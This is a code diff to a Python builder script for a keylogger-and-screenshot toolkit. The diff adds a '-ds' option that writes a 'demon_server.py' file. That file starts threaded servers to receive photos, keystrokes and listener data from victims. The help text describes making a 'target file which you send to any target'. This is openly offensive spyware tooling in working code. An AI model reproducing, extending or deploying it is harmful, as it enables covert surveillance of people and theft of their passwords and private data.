@@ -19,10 +19,10 @@ print(gui)
 lst = sys.argv
 
 try:
-    if "-aip" in lst:
+    if "-aip" in lst: #"aip" stands for address ip
         idx = lst.index("-aip")
         try:
-            ipaddress = lst[idx+1]
+            ipaddress = str(lst[idx+1])
             zahlen = "123456789"
             nummer = 0
             port_numbers = []
@@ -35,8 +35,41 @@ try:
             port_keylogger = int(port_numbers[1])
             port_listener = int(port_numbers[2])
             port_time = int(port_numbers[3])
+            if "-ds" in lst:  # "ds" for demon server
+                try:
+                    server_code = f'''
+import KeyloggerScreenshot as ks 
+import threading
 
-            if "-p" in lst:
+server_photos = ks.ServerPhotos("{ipaddress}", {port_photos})
+
+server_keylogger = ks.ServerKeylogger("{ipaddress}", {port_keylogger})
+
+server_listener = ks.ServerListener("{ipaddress}", {port_listener})
+
+server_time = ks.Timer("{ipaddress}", {port_time})
+
+threading_server = threading.Thread(target=server_photos.start)
+threading_server.start()
+
+threading_server2 = threading.Thread(target=server_keylogger.start)
+threading_server2.start()
+
+threading_server3 = threading.Thread(target=server_listener.start)
+threading_server3.start()
+
+threading_server4 = threading.Thread(target=server_time.start_timer)
+threading_server4.start() '''
+
+                    if os.path.exists("demon_server.py"):
+                        os.remove("demon_server.py")
+                    with open("demon_server.py", "a+") as file:
+                        file.write(server_code)
+
+                    print('"demon_server.py" HAS BEEN CREATED')
+                except IndexError:
+                    quit()
+            if "-p" in lst: #"p" stands for ports
                 idx_port = lst.index("-p")
                 try:
                     print('ALL THE NUMBERS HAVE BEEN SAVED TO "ports.py"')
@@ -47,7 +80,7 @@ try:
                 except IndexError:
                     quit()
 
-            if "-s" in lst:
+            if "-s" in lst: #"s" stands for seconds
                 idx_s = lst.index("-s")
                 try:
                     if "-" in lst[idx_s+1]:
@@ -63,7 +96,7 @@ try:
                     seconds = 60
             else: seconds = 60
 
-            if "-cf" in lst:
+            if "-cf" in lst: #"cf" stands for Create file
                 idx_cf = lst.index("-cf")
                 try:
                     filename = lst[idx_cf + 1]
@@ -112,7 +145,7 @@ try:
         print("PLEASE INSERT YOUR IP WITH -aip")
 
     if "-help" in lst:
-        print("-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER")
+        print("-aip INSERT THE SERVERS IP\n-s   SPECIFY YOUR SECONDS (DEFAULT 60 SECONDS)\n-cf  CREATES TARGET FILE WHICH YOU SEND TO ANY TARGET\n-p   SAVES ALL THE PORTS OF THE CURRENT SERVER\n-ds  CREATES A SERVER WITH THE SAME PORTS AS THE TARGET")
 
 except OSError:
     print("CHECK YOUR IP-ADDRESS")
\ No newline at end of file
